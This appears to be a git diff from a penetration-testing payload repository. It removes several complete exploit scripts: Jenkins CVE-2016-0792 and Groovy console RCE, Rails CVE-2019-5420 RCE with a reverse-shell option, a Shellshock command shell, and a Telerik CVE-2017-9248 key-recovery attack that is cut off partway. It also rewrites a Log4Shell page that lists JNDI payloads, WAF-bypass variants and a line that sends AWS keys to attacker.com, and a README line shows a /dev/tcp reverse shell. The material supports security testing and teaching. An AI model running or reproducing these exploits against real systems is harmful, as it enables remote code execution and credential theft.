x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x39\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x00\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x18\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x6c\x69\x45\x6e\x74\x72\x79\x50\x6f\x69\x6e\x74\x71\x00\x7e\x00\x24\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x74\x00\x1d\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x28\x31\x2c\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x29'
-
-sock.send(payload)
-print('[+] Sent payload')
diff --git a/CVE Exploits/Jenkins CVE-2016-0792.py b/CVE Exploits/Jenkins CVE-2016-0792.py
deleted file mode 100644
index fdf4163..0000000
--- a/CVE Exploits/Jenkins CVE-2016-0792.py	
+++ /dev/null
@@ -1,84 +0,0 @@
-#! /usr/bin/env python2
-
-#Jenkins Groovy XML RCE (CVE-2016-0792)
-#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
-#Made with <3 by @byt3bl33d3r
-
-from __future__ import print_function
-import requests
-from requests.packages.urllib3.exceptions import InsecureRequestWarning
-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
-
-import argparse
-import sys
-
-parser = argparse.ArgumentParser()
-parser.add_argument('target', type=str, help='Target IP:PORT')
-parser.add_argument('command', type=str, help='Command to run on target')
-parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
-
-if len(sys.argv) < 2:
-    parser.print_help()
-    sys.exit(1)
-
-args = parser.parse_args()
-
-if len(args.target.split(':')) != 2:
-    print('[-] Target must be in format IP:PORT')
-    sys.exit(1)
-
-if not args.command:
-    print('[-] You must specify a command to run')
-    sys.exit(1)
-
-ip, port = args.target.split(':')
-
-print('[*] Target IP: {}'.format(ip))
-print('[*] Target PORT: {}'.format(port))
-
-xml_formatted = ''
-command_list = args.command.split()
-for cmd in command_list:
-    xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd)
-
-xml_payload = '''<map>
-  <entry>
-    <groovy.util.Expando>
-      <expandoProperties>
-        <entry>
-          <string>hashCode</string>
-          <org.codehaus.groovy.runtime.MethodClosure>
-            <delegate class="groovy.util.Expando" reference="../../../.."/>
-            <owner class="java.lang.ProcessBuilder">
-              <command>
-                {}
-              </command>
-              <redirectErrorStream>false</redirectErrorStream>
-            </owner>
-            <resolveStrategy>0</resolveStrategy>
-            <directive>0</directive>
-            <parameterTypes/>
-            <maximumNumberOfParameters>0</maximumNumberOfParameters>
-            <method>start</method>
-          </org.codehaus.groovy.runtime.MethodClosure>
-        </entry>
-      </expandoProperties>
-    </groovy.util.Expando>
-   <int>1</int>
- </entry>
-</map>'''.format(xml_formatted.strip())
-
-print('[*] Generated XML payload:')
-print(xml_payload)
-print() 
-
-print('[*] Sending payload')
-headers = {'Content-Type': 'text/xml'}
-r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
-
-paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
-if r.status_code == 500:
-    for path in paths_in_trace:
-        if path in r.text:
-            print('[+] Command executed successfully')
-            break
diff --git a/CVE Exploits/Jenkins Groovy Console.py b/CVE Exploits/Jenkins Groovy Console.py
deleted file mode 100644
index 2c32fc9..0000000
--- a/CVE Exploits/Jenkins Groovy Console.py	
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env python
-# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
-# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
-from __future__ import print_function
-from builtins import input
-import requests
-import sys
-
-print("""
-Jenkins Groovy Console cmd runner.
-
-usage: ./jgc.py [HOST]
-
-Then type any command and wait for STDOUT output from remote machine.
-Type 'exit' to exit :)
-""")
-URL = sys.argv[1] + '/scriptText'
-HEADERS = {
-    'User-Agent': 'jgc'
-}
-
-while 1:
-    CMD = input(">> Enter command to execute (or type 'exit' to exit): ")
-    if CMD == 'exit':
-        print("exiting...\n")
-        exit(0)
-
-    DATA = {
-        'script': 'println "{}".execute().text'.format(CMD)
-    }
-    result = requests.post(URL, headers=HEADERS, data=DATA)
-    print(result.text)
\ No newline at end of file
diff --git a/CVE Exploits/Log4Shell.md b/CVE Exploits/Log4Shell.md
index 1099df8..4d9a9e5 100644
--- a/CVE Exploits/Log4Shell.md	
+++ b/CVE Exploits/Log4Shell.md	
@@ -1,107 +1,107 @@
-# CVE-2021-44228 Log4Shell
-
-> Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled
-
-## Summary
-
-* [Vulnerable code](#vulnerable-code)
-* [Payloads](#payloads)
-* [Scanning](#scanning)
-* [WAF Bypass](#waf-bypass)
-* [Exploitation](#exploitation)
-    * [Environment variables exfiltration](#environment-variables-exfiltration)
-    * [Remote Command Execution](#remote-command-execution)
-* [References](#references)
-
-## Vulnerable code
-
-You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn](
-https://github.com/leonjza/log4jpwn)
-
-```java
-public String index(@RequestHeader("X-Api-Version") String apiVersion) {
-    logger.info("Received a request for API version " + apiVersion);
-    return "Hello, world!";
-}
-```
-
-## Payloads
-
-```bash
-# Identify Java version and hostname
-${jndi:ldap://${java:version}.domain/a}
-${jndi:ldap://${env:JAVA_VERSION}.domain/a}
-${jndi:ldap://${sys:java.version}.domain/a}
-${jndi:ldap://${sys:java.vendor}.domain/a}
-${jndi:ldap://${hostName}.domain/a}
-${jndi:dns://${hostName}.domain}
-
-# More enumerations keywords and variables
-java:os
-docker:containerId
-web:rootDir
-bundle:config:db.password
-```
-
-## Scanning
-
-* [log4j-scan](https://github.com/fullhunt/log4j-scan)
-
-    ```powershell
-    usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
-                        [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
-    python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test
-    python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass
-    ```
-
-* [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
-
-## WAF Bypass
-
-```powershell
-${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
-
-# using lower and upper
-${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
-${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
-${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
-
-# using env to create the letter
-${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
-${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
-```
-
-## Exploitation
-
-### Environment variables exfiltration
-
-```powershell
-${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
-
-# AWS Access Key
-${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
-```
-
-### Remote Command Execution
-
-* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi)
-
-    ```ps1
-    java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21"
-    Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
-    Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
-    Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
-    Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
-    Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
-    Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
-    Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
-    Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
-    ```
-
-* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit)
-
-## References
-
-* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day/)
-* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
-* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
+# CVE-2021-44228 Log4Shell
+
+> Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled
+
+## Summary
+
+* [Vulnerable code](#vulnerable-code)
+* [Payloads](#payloads)
+* [Scanning](#scanning)
+* [WAF Bypass](#waf-bypass)
+* [Exploitation](#exploitation)
+    * [Environment variables exfiltration](#environment-variables-exfiltration)
+    * [Remote Command Execution](#remote-command-execution)
+* [References](#references)
+
+## Vulnerable code
+
+You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn](
+https://github.com/leonjza/log4jpwn)
+
+```java
+public String index(@RequestHeader("X-Api-Version") String apiVersion) {
+    logger.info("Received a request for API version " + apiVersion);
+    return "Hello, world!";
+}
+```
+
+## Payloads
+
+```bash
+# Identify Java version and hostname
+${jndi:ldap://${java:version}.domain/a}
+${jndi:ldap://${env:JAVA_VERSION}.domain/a}
+${jndi:ldap://${sys:java.version}.domain/a}
+${jndi:ldap://${sys:java.vendor}.domain/a}
+${jndi:ldap://${hostName}.domain/a}
+${jndi:dns://${hostName}.domain}
+
+# More enumerations keywords and variables
+java:os
+docker:containerId
+web:rootDir
+bundle:config:db.password
+```
+
+## Scanning
+
+* [log4j-scan](https://github.com/fullhunt/log4j-scan)
+
+    ```powershell
+    usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
+                        [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
+    python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test
+    python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass
+    ```
+
+* [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
+
+## WAF Bypass
+
+```powershell
+${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
+
+# using lower and upper
+${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
+${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
+${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
+
+# using env to create the letter
+${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
+${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
+```
+
+## Exploitation
+
+### Environment variables exfiltration
+
+```powershell
+${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/
+
+# AWS Access Key
+${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
+```
+
+### Remote Command Execution
+
+* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi)
+
+    ```ps1
+    java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21"
+    Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference
+    Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference
+    Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat
+    Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy
+    Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1
+    Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
+    Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2
+    Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
+    ```
+
+* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit)
+
+## References
+
+* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
+* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
+* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)
diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md
index 61f3711..c0c318b 100644
--- a/CVE Exploits/README.md	
+++ b/CVE Exploits/README.md	
@@ -41,7 +41,7 @@ Afftected systems:
 
 ### CVE-2017-5638 - Apache Struts 2
 
-On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
+On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the "Content-Type" header.
 
 ### CVE-2018-7600 - Drupalgeddon 2
 
@@ -78,8 +78,8 @@ curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/44
 
 ## References
 
-* [Heartbleed - Official website](http://heartbleed.com)
-* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))
-* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
-* [EternalBlue - Wikipedia](https://en.wikipedia.org/wiki/EternalBlue)
-* [BlueKeep - Microsoft](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
+* [Heartbleed - Official website](https://web.archive.org/web/20260302163556/https://heartbleed.com/)
+* [Shellshock - Wikipedia](https://web.archive.org/web/20140929214920/http://en.wikipedia.org:80/wiki/Shellshock_(software_bug))
+* [Imperva Apache Struts analysis](https://web.archive.org/web/20180305002332/https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
+* [EternalBlue - Wikipedia](https://web.archive.org/web/20260304111336/https://en.wikipedia.org/wiki/EternalBlue)
+* [BlueKeep - Microsoft](https://web.archive.org/web/20201104070840/https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)
diff --git a/CVE Exploits/Rails CVE-2019-5420.rb b/CVE Exploits/Rails CVE-2019-5420.rb
deleted file mode 100644
index 647f03f..0000000
--- a/CVE Exploits/Rails CVE-2019-5420.rb	
+++ /dev/null
@@ -1,156 +0,0 @@
-require 'erb'
-require "./demo-5.2.1/config/environment"
-require "base64"
-require 'net/http'
-
-$proxy_addr = '127.0.0.1'
-$proxy_port = 8080
-
-$remote = "http://172.18.0.3:3000"
-$ressource = "/demo"
-
-puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n"
-
-print "[+] Checking if vulnerable to CVE-2019-5418 => "
-uri = URI($remote + $ressource)
-req = Net::HTTP::Get.new(uri)
-req['Accept'] = "../../../../../../../../../../etc/passwd{{"
-res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
-  http.request(req)
-}
-if res.body.include? "root:x:0:0:root:"
-   puts "\033[92mOK\033[0m"
-else
-    puts "KO"
-    abort
-end
-
-print "[+] Getting file => credentials.yml.enc => "
-path = "../../../../../../../../../../config/credentials.yml.enc{{"
-for $i in 0..9
-    uri = URI($remote + $ressource)
-    req = Net::HTTP::Get.new(uri)
-    req['Accept'] = path[3..57]
-    res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
-        http.request(req)
-    }
-    if res.code == "200"
-        puts "\033[92mOK\033[0m"
-        File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) }
-        break
-    end
-    path = path[3..57]
-    $i +=1;
-end
-
-print "[+] Getting file => master.key => "
-path = "../../../../../../../../../../config/master.key{{"
-for $i in 0..9
-    uri = URI($remote + $ressource)
-    req = Net::HTTP::Get.new(uri)
-    req['Accept'] = path[3..57]
-    res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
-        http.request(req)
-    }
-    if res.code == "200"
-        puts "\033[92mOK\033[0m"
-        File.open("master.key", 'w') { |file| file.write(res.body) }
-        break
-    end
-    path = path[3..57]
-    $i +=1;
-end
-
-print "[+] Decrypt secret_key_base => "
-credentials_config_path = File.join("../", "credentials.yml.enc")
-credentials_key_path = File.join("../", "master.key")
-ENV["RAILS_MASTER_KEY"] = res.body
-credentials = ActiveSupport::EncryptedConfiguration.new(
-    config_path: Rails.root.join(credentials_config_path),
-    key_path: Rails.root.join(credentials_key_path),
-    env_key: "RAILS_MASTER_KEY",
-    raise_if_missing_key: true
-)
-if credentials.secret_key_base != nil
-    puts "\033[92mOK\033[0m"
-    puts ""
-    puts "secret_key_base": credentials.secret_key_base
-    puts ""
-end
-
-puts "[+] Getting reflective command (R) or reverse shell (S) => "
-loop do 
-    begin
-        input = [(print 'Select option R or S: '), gets.rstrip][1]
-        if input == "R"
-            puts "Reflective command selected"
-            command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1]
-        elsif input == "S"
-            puts "Reverse shell selected"
-            command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1]
-        else
-            puts "No option selected"
-            abort
-        end
-
-        command_b64 = Base64.encode64(command)
-
-        print "[+] Generating payload CVE-2019-5420 => "
-        secret_key_base = credentials.secret_key_base
-        key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000))
-        secret = key_generator.generate_key("ActiveStorage")
-        verifier = ActiveSupport::MessageVerifier.new(secret)
-        if input == "R"
-            code = "system('bash','-c','" + command + " > /tmp/result.txt')"
-        else
-            code = "system('bash','-c','" + command + "')"
-        end 
-        erb = ERB.allocate
-        erb.instance_variable_set :@src, code
-        erb.instance_variable_set :@filename, "1"
-        erb.instance_variable_set :@lineno, 1
-        dump_target  = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
-
-        puts "\033[92mOK\033[0m"
-        puts ""
-        url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test"
-        puts url
-        puts ""
-
-        print "[+] Sending request => "
-        uri = URI(url)
-        req = Net::HTTP::Get.new(uri)
-        req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-        res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
-        http.request(req)
-        }
-        if res.code == "500"
-            puts "\033[92mOK\033[0m"
-        else
-            puts "KO"
-            abort
-        end
-
-        if input == "R"
-            print "[+] Getting result of command => "
-            uri = URI($remote + $ressource)
-            req = Net::HTTP::Get.new(uri)
-            req['Accept'] = "../../../../../../../../../../tmp/result.txt{{"
-            res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
-            http.request(req)
-            }
-            if res.code == "200"
-                puts "\033[92mOK\033[0m\n\n"
-                puts res.body
-                puts "\n"
-            else
-                puts "KO"
-                abort
-            end
-        end
-        
-    rescue Exception => e
-        puts "Exiting..."
-        abort
-    end
-end
diff --git a/CVE Exploits/Shellshock CVE-2014-6271.py b/CVE Exploits/Shellshock CVE-2014-6271.py
deleted file mode 100644
index 3246c80..0000000
--- a/CVE Exploits/Shellshock CVE-2014-6271.py	
+++ /dev/null
@@ -1,36 +0,0 @@
-#!/usr/bin/python
-
-# Successful Output:
-# # python shell_shocker.py <VulnURL>
-# [+] Attempting Shell_Shock - Make sure to type full path
-# ~$ /bin/ls /
-# bin
-# boot
-# dev
-# etc
-# ..
-# ~$ /bin/cat /etc/passwd
-
-from __future__ import print_function
-from future import standard_library
-standard_library.install_aliases()
-from builtins import input
-import sys, urllib.request, urllib.error, urllib.parse
-
-if len(sys.argv) != 2:
-        print("Usage: shell_shocker <URL>")
-        sys.exit(0)
-
-URL=sys.argv[1]
-print("[+] Attempting Shell_Shock - Make sure to type full path")
-
-while True:
-        command=input("~$ ")
-        opener=urllib.request.build_opener()
-        opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
-        try:
-                response=opener.open(URL)
-                for line in response.readlines():
-                        print(line.strip())
-        except Exception as e: print(e)
-
diff --git a/CVE Exploits/Telerik CVE-2017-9248.py b/CVE Exploits/Telerik CVE-2017-9248.py
deleted file mode 100644
index 330c887..0000000
--- a/CVE Exploits/Telerik CVE-2017-9248.py	
+++ /dev/null
@@ -1,362 +0,0 @@
-# Author: Paul Taylor / @bao7uo
-
-# https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py
-
-# dp_crypto - CVE-2017-9248 exploit
-# Telerik.Web.UI.dll Cryptographic compromise
-
-# Warning - no cert warnings,
-# and verify = False in code below prevents verification
-
-import sys
-import base64
-import requests
-import re
-import binascii
-import argparse
-
-from requests.packages.urllib3.exceptions import InsecureRequestWarning
-
-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
-
-requests_sent = 0
-char_requests = 0
-
-
-def getProxy(proxy):
-    return { "http" : proxy, "https" : proxy }
-
-
-def get_result(plaintext, key, session, pad_chars):
-    global requests_sent, char_requests
-
-    url = args.url
-    base_pad = (len(key) % 4)
-    base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]
-    dp_encrypted = base64.b64encode(
-                                (encrypt(plaintext, key) + base).encode()
-                            ).decode()
-    request = requests.Request('GET', url + '?dp=' + dp_encrypted)
-    request = request.prepare()
-    response = session.send(request, verify=False, proxies = getProxy(args.proxy))
-    requests_sent += 1
-    char_requests += 1
-
-    match = re.search("(Error Message:)(.+\n*.+)(</div>)", response.text)
-    return True \
-        if match is not None \
-        and match.group(2) == args.oracle \
-        else False
-
-def test_keychar(keychar, found, session, pad_chars):
-    base64chars = [
-                    "A", "Q", "g", "w", "B", "R", "h", "x", "C", "S", "i", "y",
-                    "D", "T", "j", "z", "E", "U", "k", "0", "F", "V", "l", "1",
-                    "G", "W", "m", "2", "H", "X", "n", "3", "I", "Y", "o", "4",
-                    "J", "Z", "p", "5", "K", "a", "q", "6", "L", "b", "r", "7",
-                    "M", "c", "s", "8", "N", "d", "t", "9", "O", "e", "u", "+",
-                    "P", "f", "v", "/"
-                  ]
-
-    duff = False
-    accuracy_thoroughness_threshold = args.accuracy
-    for bc in range(int(accuracy_thoroughness_threshold)):
-                                                # ^^ max is len(base64chars)
-        sys.stdout.write("\b\b" + base64chars[bc] + "]")
-        sys.stdout.flush()
-        if not get_result(
-                      base64chars[0] * len(found) + base64chars[bc],
-                      found + keychar, session, pad_chars
-                      ):
-            duff = True
-            break
-    return False if duff else True
-
-
-def encrypt(dpdata, key):
-    encrypted = []
-    k = 0
-    for i in range(len(dpdata)):
-        encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k])))
-        k = 0 if k >= len(key) - 1 else k + 1
-    return ''.join(str(e) for e in encrypted)
-
-
-def mode_decrypt():
-    ciphertext = base64.b64decode(args.ciphertext).decode()
-    key = args.key
-    print(base64.b64decode(encrypt(ciphertext, key)).decode())
-    print("")
-
-
-def mode_encrypt():
-    plaintext = args.plaintext
-    key = args.key
-
-    plaintext = base64.b64encode(plaintext.encode()).decode()
-    print(base64.b64encode(encrypt(plaintext, key).encode()).decode())
-    print("")
-
-
-def test_keypos(key_charset, unprintable, found, session):
-    pad_chars = ''
-    for pad_char in range(256):
-        pad_chars += chr(pad_char)
-
-    for i in range(len(pad_chars)):
-        for k in range(len(key_charset)):
-            keychar = key_charset[k]
-            sys.stdout.write("\b"*6)
-            sys.stdout.write(
-                        (
-                            keychar
-                            if unprintable is False
-                            else '+'
-                        ) +
-                        ") [" + (
-                            keychar
-                            if unprintable is False
-                            else '+'
-                        ) +
-                        "]"
-                    )
-            sys.stdout.flush()
-            if test_keychar(keychar, found, session, pad_chars[i] * 3):
-                return keychar
-    return False
-
-
-def get_key(session):
-    global char_requests
-    found = ''
-    unprintable = False
-
-    key_length = args.key_len
-    key_charset = args.charset
-    if key_charset == 'all':
-        unprintable = True
-        key_charset = ''
-        for i in range(256):
-            key_charset += chr(i)
-    else:
-        if key_charset == 'hex':
-            key_charset = '01234567890ABCDEF'
-
-    print("Attacking " + args.url)
-    print(
-        "to find key of length [" +
-        str(key_length) +
-        "] with accuracy threshold [" +
-        str(args.accuracy) +
-        "]"
-    )
-    print(
-        "using key charset [" +
-        (
-            key_charset
-            if unprintable is False
